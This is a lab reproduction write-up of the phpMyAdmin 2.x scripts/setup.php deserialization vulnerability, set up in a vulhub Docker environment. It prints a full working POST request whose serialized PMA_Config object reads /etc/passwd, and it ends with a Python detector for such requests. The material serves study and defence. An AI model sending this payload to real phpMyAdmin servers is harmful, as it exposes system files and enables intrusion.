[vulnerability reproduction] phpMyAdmin scripts/setup.php deserialization vulnerability (wooyun-2016-199433)

0x01 vulnerability background

phpMyAdmin 2.x contains a deserialization vulnerability through which an attacker can read arbitrary files or execute arbitrary code.

0x02 vulnerability environment

Build the environment with vulhub's Docker setup.

Run the following command in /home/vulhub/phpMyAdmin/wooyun-2016-199433 to start phpMyAdmin:

docker-compose up -d

Confirm that the exposed port is 8080.

After the environment has started, visit http://ip:8080 to see the phpMyAdmin home page. Because no database is connected, an error is reported at this point, but exploiting this vulnerability does not depend on the database, so the error can be ignored.

0x03 vulnerability reproduction

Capture the request with BP (Burp Suite).

Send the following request to read /etc/passwd:

POST /scripts/setup.php HTTP/1.1
Host: ip:8080
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

You can view the contents of the /etc/passwd file.
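One way to spot this request in captured traffic or proxy logs, as an added example that is not part of the original post or of phpMyAdmin: it flags POSTs to scripts/setup.php whose configuration field contains a PHP serialized object token. The function names, the finding format and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# PHP serialize() object token: O:<name length>:"<class>":<property count>:{
# (C: is the Serializable form). The optional '+' covers the signed-length
# spelling that some older PHP parsers tolerate.
OBJECT_TOKEN = re.compile(
    r'(?<![A-Za-z0-9])[OC]:\+?(\d+):"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{')
SETUP_PATH = "/scripts/setup.php"  # endpoint named on this page


def serialized_classes(value):
    """Class names of PHP object tokens in an already URL-decoded value."""
    return [m.group(2) for m in OBJECT_TOKEN.finditer(value)
            if int(m.group(1)) == len(m.group(2))]  # declared length must match


def inspect_request(method, target, body):
    """Return a finding if a POST to setup.php carries a serialized object
    in its 'configuration' field, else None."""
    path = urlsplit(target).path
    if method.upper() != "POST" or not path.endswith(SETUP_PATH):
        return None
    fields = parse_qs(body, keep_blank_values=True)  # also percent-decodes
    classes = [c for v in fields.get("configuration", [])
               for c in serialized_classes(v)]
    if not classes:
        return None
    return {"path": path, "parameter": "configuration", "classes": classes}


# Constructed samples: the body shown above, the same body percent-encoded,
# and a body holding only a serialized array (no object token).
SAMPLES = [
    ("POST", "/scripts/setup.php", 'action=test&configuration='
     'O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}'),
    ("POST", "/scripts/setup.php", "action=test&configuration="
     "O%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%2C"
     "s%3A11%3A%22%2Fetc%2Fpasswd%22%3B%7D"),
    ("POST", "/scripts/setup.php",
     'action=test&configuration=a:1:{s:7:"Servers";a:0:{}}'),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(inspect_request(method, target, body))
```

The check inspects the decoded parameter value, so the percent-encoded form of the same body is flagged as well, while a body that holds only a serialized array is not.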
